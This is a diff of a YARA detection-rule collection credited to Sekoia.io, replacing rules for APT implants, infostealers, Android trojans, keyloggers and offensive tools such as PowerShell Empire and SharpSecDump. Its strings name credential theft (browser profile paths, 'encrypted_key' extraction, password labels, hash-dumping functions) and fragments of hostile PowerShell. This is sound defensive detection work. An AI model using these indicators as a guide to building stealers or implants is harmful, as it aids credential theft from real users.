+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_reco_pshscript.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "fceffb8ae94cef3af21b2943131e94db9e0e67073de48d9d32601a245448d067"
-		logic_hash = "c57676b765364c5c51d2bf231b5fe858129b45ba837ec6554b353177bb16bd8a"
-		score = 65
+		logic_hash = "86369267545241f33c6fc7dab11eb06f71641d8e9cd0365ddcc676d4f4c9739b"
+		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 30 }
-		$ = "ThisDocument" wide
+		$ = "$headers = @{};"
+		$ = "==ARP Cache=="
+		$ = "ipconfig.me"
+		$ = "-ComputerName $env:computername;"
 
 	condition:
-		uint32be( 0 ) == 0xd0cf11e0 and all of them
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Apt_Apt37_Chinotto_Powershell_Variant
+rule SEKOIA_Apt_Toneshell_Loader : FILE
 {
 	meta:
-		description = "Detects APT37 Chinotto Powershell Variant"
+		description = "Detects loader of ToneShell (exception based)"
 		author = "Sekoia.io"
-		id = "fa42b225-58fe-4e00-b84b-df37491d8fdd"
-		date = "2023-03-06"
+		id = "b4bf284b-cab6-455e-a1c1-ad341d43bfdd"
+		date = "2024-10-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt37_chinotto_powershell_variant.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_toneshell_loader.yar#L1-L40"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b4d17467f15d52bd615e335fa8bc31381ec273b67dabb74655f47179f04f631f"
+		hash = "41e0d172d900344a3692b88fff7527d9"
+		hash = "782cf7183735935f3f7aad041cec3184"
+		hash = "97c1f436028c58b51d4c92ee9c9ce424"
+		hash = "d6c771f2afd8ce35e8727f95f3a3c6c4"
+		hash = "b8520c5bad88ade394086cb7b1b7b631"
+		hash = "0b3e8571e70a32490da19f6b3283151c"
+		hash = "f6784c65ee115a9ae4c0fb03e0045285"
+		hash = "38888696e5223c77f5f8680922396123"
+		hash = "b52d0707e4e5d5c0d5fd5f5a177ba712"
+		hash = "fd54c6d17ff91640b377ff41353efdaa"
+		hash = "a6efe263acc794a212647a96e52ddf1f"
+		hash = "6e8c80c5f2f9a1da504618e984d2a56c"
+		hash = "0839666697ccc562a9c1fe77d6755931"
+		hash = "f367f2fe580e556176b60da202c742a5"
+		hash = "e8b2fcc14494ada2f28d1f6ecd2521a2"
+		hash = "c08589e10812cc7d636dcbe2a36d43b4"
+		hash = "fa848a05cfecc0c25cd21364c9516584"
+		hash = "be231f7879d8d2159b67b7f277527268"
+		hash = "2acd8b48202dcc30d88a871370c4f37a"
+		hash = "72963bfc2837695f038680471d4f061c"
+		logic_hash = "40e1b918a4d83a4918260d8b1cc56e5097665a366f94bd5068e4ae519e3a681b"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$env:COMPUTERNAME + '-' + $env:USERNAME;" ascii wide
-		$ = "while($true -eq $true)" ascii wide
-		$ = "Start-Sleep -Seconds" ascii wide
-		$ = " -ne 'null' -and $" ascii wide
-		$ = "= 'R=' + [System.Convert]::" ascii wide
-		$ = "[string]$([char]0x0D) + [string]$([char]0x0A);" ascii wide
+		$exception = {00 00 00 00 2e 44 00 00}
+		$code = {02 00 00 00 66 89 96}
+		$kernel32 = "Kernel32.dll" wide
+		$outputdbgstr = "OutputDebugStringA"
+		$content = "ResetEvent"
 
 	condition:
-		4 of them
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 2MB
 }
-rule SEKOIA_Trojan_Android_Xenomorph : FILE
+rule SEKOIA_Apt_Konni_Dropper : FILE
 {
 	meta:
-		description = "Detect samples of the Android banking trojan Xenomorph"
+		description = "Detects Konni dropper used when distributed via malicious document"
 		author = "Sekoia.io"
-		id = "ec65ca1b-e71f-4772-8be0-2a2b6a690987"
-		date = "2022-02-25"
+		id = "0783a55e-1d1e-40ca-a661-2c5dec6d78d6"
+		date = "2023-11-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_android_xenomorph.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_konni_dropper.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d44e5742449cd9c19b50ab23f452378d5627e19140554d12086994d820df9c64"
+		logic_hash = "6d1b1f5ccbdc20908891e5f40ceb85c251b1ca2a395fa4b106e63718c6393a22"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255120,25 +255212,26 @@ rule SEKOIA_Trojan_Android_Xenomorph : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ass0 = "assets/shadows/knife_shadow_"
-		$ass1 = "assets/knife_"
-		$ass2 = "okhttp3"
+		$ = "UnzipAFile"
+		$ = "check.bat"
+		$ = "FOF_SILENT"
+		$ = "fLieObj"
 
 	condition:
-		uint32be( 0 ) == 0x504B0304 and filesize > 1MB and filesize < 4MB and #ass0 > 10 and #ass1 > 10 and $ass2
+		filesize < 1MB and 3 of them
 }
-rule SEKOIA_Apt_Sidecopy_Actionrat_Packer_Strings : FILE
+rule SEKOIA_Malware_Sugargh0St_Strings : FILE
 {
 	meta:
-		description = "Detects SideCopy's ActionRAT (packer?)"
+		description = "Detects SugarGh0st based on strings"
 		author = "Sekoia.io"
-		id = "b9370bd5-12e1-448e-a5b1-2acc72adc4a7"
-		date = "2023-05-11"
+		id = "51930498-b04a-4f13-8d14-ee975a28126e"
+		date = "2023-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sidecopy_actionrat_packer_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_sugargh0st_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1bb6896ac3efa0e43cc27f56d7324ab9bdd2c401941eeefc4e7be62b407657af"
+		logic_hash = "b878b5d3b3f62952d79c0ea5811838f4e79302b85f25494e91dc730dec8e1d8d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255146,53 +255239,50 @@ rule SEKOIA_Apt_Sidecopy_Actionrat_Packer_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "(HTTP/1\\.[01]) (\\d{3})(?: (.*?))?"
-		$ = "cpp-httplib/0.7"
-		$ = "\\HTTP Arsanel\\"
+		$ = "%sd.%s /c \"%s\"" wide
+		$ = "[Num Lock]" wide
+		$ = "#32770" wide
+		$ = "]%s (%4d-%02d-%02d %02d:%02d:%02d)" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
 }
-rule SEKOIA_Apt_Implant_Xdealer_Strings : FILE
+
+rule SEKOIA_Backdoor_Win_Mgbot_Main
 {
 	meta:
-		description = "Detects XDealer based on strings"
+		description = "Detect MgBot main.dll file"
 		author = "Sekoia.io"
-		id = "06ef72ca-b4e3-493b-8e01-d34b98259c6d"
-		date = "2024-03-22"
+		id = "528baa11-58d5-470a-bd6d-963d4ac75d97"
+		date = "2024-03-20"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_implant_xdealer_strings.yar#L1-L20"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt-attacks-telecoms-africa-mgbot"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_mgbot_main.yar#L4-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "13c0bbc933f68164b0fe1c2768148bb649b1755bed0cfbc6ed90188fab6876d5"
+		logic_hash = "61b335c88ce8bc56396b597c7c6f27b1d431941682401f0b3950c80edf7d8403"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "unknow_PC"
-		$ = "rdp-tcp#"
-		$ = "Din_%s_%s_%u_"
-		$ = "nslookup %s %s"
-		$ = "XFByb2dyYW1EYXRhXA=="
+		hash1 = "706c9030c2fa5eb758fa2113df3a7e79257808b3e79e46869d1bf279ed488c36"
+		hash2 = "017187a1b6d58c69d90d81055db031f1a7569a3b95743679b21e44ea82cfb6c7"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 1MB
+		pe.imphash( ) == "8e1ee04a99c77bd54c6dc55214ffa2e3" or hash.md5 ( pe.rich_signature.clear_data ) == "67e8e8b75b981b5c8ff31149dc2c61b2" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "7c6adf9987e6dfbf19b5f156b0314798" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "46fa9f5a035c8ae8de1a0d14150bd5ef" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f7895f9456f8d51125e6744960c38133" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5d82bb8a7ef37c417615381b446f715c" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "d7808c6662f098e685040f7c61bc033d9e73002f674de7cf2ffcd6230d60d429" )
 }
-rule SEKOIA_Trojan_And_Keepspy : FILE
+rule SEKOIA_Tool_Gost_Tunnel_Strings : FILE
 {
 	meta:
-		description = "Finds KeepSpy samples based on specific strings"
+		description = "Detects GOST Go Tunnel, based on strings"
 		author = "Sekoia.io"
-		id = "9390e7c8-a996-45cc-b642-c23d4b7dcf34"
-		date = "2023-06-28"
+		id = "2de7aae9-9cf8-4007-aa27-5caea4123713"
+		date = "2023-02-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_and_keepspy.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_gost_tunnel_strings.yar#L1-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "03a954a5585a9a80fdc5a0cd2644a819c540d43b260e040b627530ca88ee08fa"
+		logic_hash = "eba1557acc1d9f16817a4bcd24631334a12357e45ad23f1c333de686f20f9291"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255200,29 +255290,38 @@ rule SEKOIA_Trojan_And_Keepspy : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Characters entered %1$d of %2$d" ascii
-		$str02 = "com.google.android.material.behavior.HideBottomViewOnScrollBehavior" ascii
-		$str03 = "com/j256/ormlite/core/VERSION.txt" ascii
-		$str04 = "res/raw/empty.wav" ascii
-		$str05 = "res/mipmap/ic_launcher.png" ascii
-		$str06 = "res/interpolator/fast_out_slow_in.xml" ascii
-		$str07 = "OnePixelActivity" ascii
+		$ = ".(*shadowUDPHandler).transportUDP" ascii
+		$ = ".(*quicCipherConn).decrypt" ascii
+		$ = ".(*socks4aConnector).ConnectContext.func1" ascii
+		$ = ".(*mtlsTransporter).Handshake" ascii
+		$ = ".(*FIFOStrategy).Apply" ascii
+		$ = ".dnsTCPExchanger" ascii
+		$ = ".dohResponseWriter" ascii
+		$ = ".tcpRemoteForwardListener" ascii
+		$ = ".shadowUDPPacketConn" ascii
+		$ = ".sshTunnelListener" ascii
+		$ = "/listener/rtcp/listener.go" ascii
+		$ = "/handler/unix/handler.go" ascii
+		$ = "/handler/tunnel/tunnel.go" ascii
+		$ = "/internal/net/proxyproto/listener.go" ascii
+		$ = "/internal/util/serial/conn.go" ascii
+		$ = "github.com/go-gost/x" ascii
 
 	condition:
-		uint32be( 0 ) == 0x504B0304 and 6 of them and filesize > 2MB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xcefaedfe or uint32be( 0 ) == 0xcffaedfe or uint32be( 0 ) == 0xbebafeca ) and 5 of them
 }
-rule SEKOIA_Tool_Quarkspwdump : FILE
+rule SEKOIA_Tool_Sharpsecdump : FILE
 {
 	meta:
 		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "859823f9-6d47-4b0f-844b-d3af7bad498b"
+		id = "359bf48b-81c8-4d12-ac02-777d4865411a"
 		date = "2023-06-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_quarkspwdump.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sharpsecdump.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4799e1d1c749a536d7920e3c333d69f7130376c6a0f0e0ca8f0b61e438266adb"
+		logic_hash = "f183069d843767daa97bc81385e5e1b3a19c556f8171f28f8806aebe7a226176"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255230,39 +255329,53 @@ rule SEKOIA_Tool_Quarkspwdump : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "quarks-pwdump.exe"
-		$s2 = "--------------------------------------------- BEGIN DUMP --------------------------------------------"
-		$s3 = "%s_hist%d:\"\":\"\":%s:%s"
+		$s1 = "SharpSecDump"
+		$s2 = "e2fdd6cc-9886-456c-9021-ee2c47cf67b7"
+		$s3 = "Md4Hash2"
+		$s4 = "RidToKey"
 
 	condition:
 		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Kimsuky_Sharptongue_C2_Source
+rule SEKOIA_Unk_Quad7_Fsynet_Strings : FILE
 {
 	meta:
-		description = "Detects the PHP code of the SharpTongue C2"
+		description = "Matches node-r-control, asr_node, node-relay"
 		author = "Sekoia.io"
-		id = "a2ccf773-511c-4088-8bcf-b923291d024b"
-		date = "2022-07-29"
+		id = "897b2421-c177-48c0-8f5b-82d8434208cb"
+		date = "2024-08-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharptongue_c2_source.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/unk_quad7_fsynet_strings.yar#L1-L33"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c301a99876cfe2863546c990654aa922f9327e0eb010968eaea43f1d8ced76da"
+		hash = "f42849076e24b7827218f7a25bc11ccc"
+		hash = "b3b09819f820a4ecd31f82f369000af2"
+		hash = "92093dd7ba6ae8fe34a215c4c4bd1cd4"
+		hash = "e6f6a6de285d7c2361c32b1f29a6c3f6"
+		hash = "408152285671bbd0e6e63bd71d6abaaf"
+		hash = "5efc7d824851be9ec90a97d889a40d23"
+		logic_hash = "960119a025dedae7c5dfdf872cd515e2b6cf2999179ba84374d547047316caa2"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<?php"
-		$ = "foreach($_GET as $variable => $value)"
-		$ = "$chk=$value"
-		$ = "base64_encode($ip)"
+		$ = "prev_hop_port"
+		$ = "next_hop_port"
+		$ = "back_hop_port"
+		$ = "next_tsn_port"
+		$ = "prev_hop_ip"
+		$ = "next_hop_ip"
+		$ = "back_hop_ip"
+		$ = "next_tsn_ip"
+		$ = "ikcp_"
+		$ = "/tmp/log_r"
+		$ = "total_hop"
 
 	condition:
-		all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 5MB and 6 of them
 }
 rule SEKOIA_Exploit_Ez_Pwnkit_Strings : FILE
 {
@@ -255289,74 +255402,84 @@ rule SEKOIA_Exploit_Ez_Pwnkit_Strings : FILE
 	condition:
 		uint32be( 0 ) == 0x7f454c46 and filesize < 5MB and $s1 and #s2 > 5
 }
-
-rule SEKOIA_Apt_Apt31_Rekoobe : FILE
+rule SEKOIA_Backdoor_Powershellempire_Csharp : FILE
 {
 	meta:
-		description = "Find Rekoobe sample via Trend Elf Hash (telfhash)"
+		description = "Detects CSharp version of Empire"
 		author = "Sekoia.io"
-		id = "b1461a72-76ce-4cc5-ac84-3cc87454d288"
-		date = "2023-07-10"
+		id = "952e8e9b-8e4d-4550-9cf4-7ffd2f9d0672"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt31_rekoobe.yar#L3-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_powershellempire_csharp.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "88a1a10f26ca355c4be3fd3aa914b1b1ea743018ce44c68a2f4d9e5a337d5c01"
-		score = 40
+		logic_hash = "536ef1167627c3dadb866d55e7eae2220c3fbd6961e2cfa71656656d984b9b90"
+		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ = "[-] Catastrophic .Net Agent Failure, Attempting Agent Restart:" ascii wide
+		$ = "[!] Upload failed - No Delimiter" ascii wide
+		$ = "SELECT * FROM Win32_IP4RouteTable" ascii wide
+		$ = "no shell command supplied" ascii wide
+		$ = "[-] CmdletInvocationException:" ascii wide
+		$ = "[*] File download of" ascii wide
+		$ = "Script successfully saved in memory" ascii wide
+		$ = "Invoke-Empire" ascii wide
+		$ = "website to reach:" ascii wide
+
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 100KB and elf.telfhash ( ) == "t18fc080c7c6b56a34a7f32538ac7c407982035e1581561b207f50c955d93b408404c5ef"
+		uint16be( 0 ) == 0x4d5a and 5 of them and filesize < 1MB
 }
-
-rule SEKOIA_Apt_Apt28_Susp_Graphite_Downloader : FILE
+rule SEKOIA_Apt_Cloudatlas_Init_Module_Virtualalloc : FILE
 {
 	meta:
-		description = "Matches the routine which decrypts the RSA key blob in the Graphite downloader"
+		description = "Find init module of CloudAtlas with params passed to VirtualAlloc"
 		author = "Sekoia.io"
-		id = "9c9da5fe-ffd6-4c45-8ce1-9a6cf4fa2fda"
-		date = "2022-01-26"
+		id = "299ed681-9d1f-4b47-8389-ff5a608f49d4"
+		date = "2023-09-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_susp_graphite_downloader.yar#L3-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_init_module_virtualalloc.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ca5aa7ea995aca9003fd98da2fba7bbec1e049d979a6b05e07b80876bab5a1c9"
-		score = 65
+		logic_hash = "31ffaeccc0b8fe36eea3b3a8200eff6a420b1a3937fd439dc84121654fcea502"
+		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "02a1a9582f5ccf421b08c41c35049416b9cdefc9228daf6b38d95e9b0930cc5a"
+		hash2 = "c7f19c7c295c86867ea7fa4597ba0cebe12f751753866e7298fd5d84676facc3"
 
 	strings:
-		$gen = { 33 D2
-        8B C1
-        6A ??
-        5E
-        F7 F6
-        8A 82 ?? ?? ?? ??
-        30 81 ?? ?? ?? ??
-        41
-        81 F9 94 04 00 00
-        72 E2 }
+		$chunk_1 = {
+        6A 40
+        68 00 30 10 00
+        8B 8D ?? ?? ?? ??
+        8B 51 50
+        52
+        6A 00
+        FF 15 ?? ?? ?? ??
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and $gen and pe.number_of_exports == 1
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and $chunk_1 and filesize < 3MB
 }
-rule SEKOIA_Infostealer_Win_Nemesis_In_Memory : FILE
+rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Http : FILE
 {
 	meta:
-		description = "Finds Nemesis Stealer samples based on specific strings, from samples without strings obsucation, or from memory"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "01d85bd5-ea93-44ff-b36a-9cd9eb54d634"
-		date = "2023-03-29"
+		id = "47d01ba8-9fdd-42d5-9f10-115f982dc133"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_nemesis_in_memory.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sugardump_credentials_stealer_http.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "65d2dd9a10238e6d65d8992aa9cc145f73bcba9be49ed552f8b0c44723ec4c87"
+		logic_hash = "8d1725da41704fd534d3438021a98d0fb9b9b5bfdc63cc3144c4957954be1870"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255364,185 +255487,174 @@ rule SEKOIA_Infostealer_Win_Nemesis_In_Memory : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "NemesisProject.Modules." ascii
-		$str02 = "~[NEMESIS INIZIALIZE]~" wide
-		$str03 = "Clip_BoardText.txt" wide
-		$str04 = "stealer_out.zip" wide
-		$str05 = "<span style=\"color:#FFFFFF\">Number of running processes:</span>" wide
-		$str06 = "<span style=\"color:#FFFFFF\">Installed FireWall: </span>" wide
-		$str07 = "~[Panel_Receiving_Data]~ Incorrect data when receiving data on the panel" wide
-		$str08 = "ProcessInfo_Log.txt" wide
-		$str09 = "Installed_Software_Log.txt" wide
-		$str10 = "Detect Data ClipBoard] - [ {DateTime.Now:MM.dd.yyyy - HH:mm:ss}]" wide
-		$str11 = "VPN/ProtonVPN_Log.txt" wide
-		$str12 = "VPN/Nord_Log.txt" wide
-		$str13 = "Steam/SteamID_Log.txt" wide
+		$ = "\\Google\\Chrome\\User Data" wide
+		$ = "\\DebugLogWindowsDefender.txt" wide
+		$ = "Opera Software\\Opera Stable" wide
+		$ = "Microsoft\\Edge\\User Data" wide
+		$ = "\"encrypted_key\":\"(.*?)\\" wide
+		$ = "Url:" wide
+		$ = "Username:" wide
+		$ = "Password:" wide
+		$ = "Application:" wide
+		$ = "BCrypt.BCryptDecrypt" wide
+		$ = "C:\\Users\\User\\" wide
+		$ = "_CorExeMain"
+		$ = "http://" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 10 of them
 }
-rule SEKOIA_Apt_Dark_Pink_Pdb_Path : FILE
+rule SEKOIA_Apt_Cloudatlas_Powertunnel : FILE
 {
 	meta:
-		description = "Detects PDB path of some Dark Pink sample"
+		description = "Detects PowerTunnel DLL of CloudAtlas"
 		author = "Sekoia.io"
-		id = "695586dc-66de-4f9d-814a-2d81261a7357"
-		date = "2023-01-16"
+		id = "04981493-de8b-4662-ae81-8866c182f8b2"
+		date = "2022-11-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_dark_pink_pdb_path.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powertunnel.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f67e0d50975697424313acc77a9c86e1c2b41fde1663e4f5d8f4765acb997775"
+		logic_hash = "aadb2739957d17c7e82e3abf7a178ab7b6e4a598fbbdb1a06d0c0531656d4ef6"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "C:\\Users\\hoang\\source\\repos\\Cucky\\Cucky\\obj\\Release\\net46\\Cucky.pdb" wide ascii
-		$s2 = "C:\\Users\\build\\source\\repos\\CtealWebCredential\\Release\\CtealWebCredential.pdb" wide ascii
+		$ = "BeginGetHostEntry"
+		$ = "get_AddressList"
+		$ = "time_stop_delay_seconds"
+		$ = "<connect><result>{0}</result></connect>"
+		$ = "_CorDllMain"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and any of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Implant_Win_Quantum_Builder_Lnk
+rule SEKOIA_Apt_Apt37_Chinotto_Powershell_Variant
 {
 	meta:
-		description = "Detect .LNK files created using Quantum Builder"
+		description = "Detects APT37 Chinotto Powershell Variant"
 		author = "Sekoia.io"
-		id = "65f8a426-8bf3-4f7f-b7d2-fd8da5b660f7"
-		date = "2022-06-22"
+		id = "fa42b225-58fe-4e00-b84b-df37491d8fdd"
+		date = "2023-03-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_quantum_builder_lnk.yar#L1-L44"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt37_chinotto_powershell_variant.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "dd090af0e062b633173ac8483d8659e1fd8aa7898c641714fbe4b30bdd276b3d"
+		logic_hash = "b4d17467f15d52bd615e335fa8bc31381ec273b67dabb74655f47179f04f631f"
 		score = 75
-		quality = 30
+		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$magic_lnk = { 4C 00 00 00 01 14 02 00 }
-		$powershell_ascii = "\\WindowsPowerShell\\v1.0\\powershell.exe"
-		$powershell_wide = "powershell.exe" wide
-		$start = "<#" wide
-		$end = "#>" wide
-		$foreach = "=$Null;foreach(" wide
-		$return = "};return" wide
-		$char = "[char]" wide
-		$aes = "New-Object 'System.Security.Cryptography.AesManaged'" wide nocase
-		$base64 = "[System.Convert]::FromBase64String" wide nocase
-		$decryptor = "CreateDecryptor();" wide nocase
+		$ = "$env:COMPUTERNAME + '-' + $env:USERNAME;" ascii wide
+		$ = "while($true -eq $true)" ascii wide
+		$ = "Start-Sleep -Seconds" ascii wide
+		$ = " -ne 'null' -and $" ascii wide
+		$ = "= 'R=' + [System.Convert]::" ascii wide
+		$ = "[string]$([char]0x0D) + [string]$([char]0x0A);" ascii wide
 
 	condition:
-		$magic_lnk at 0 and all of ( $powershell* ) and ( $start and $end and $foreach and $return and $char or $aes and $base64 and $decryptor )
+		4 of them
 }
-rule SEKOIA_Rat_Win_Ratel_Strings : FILE
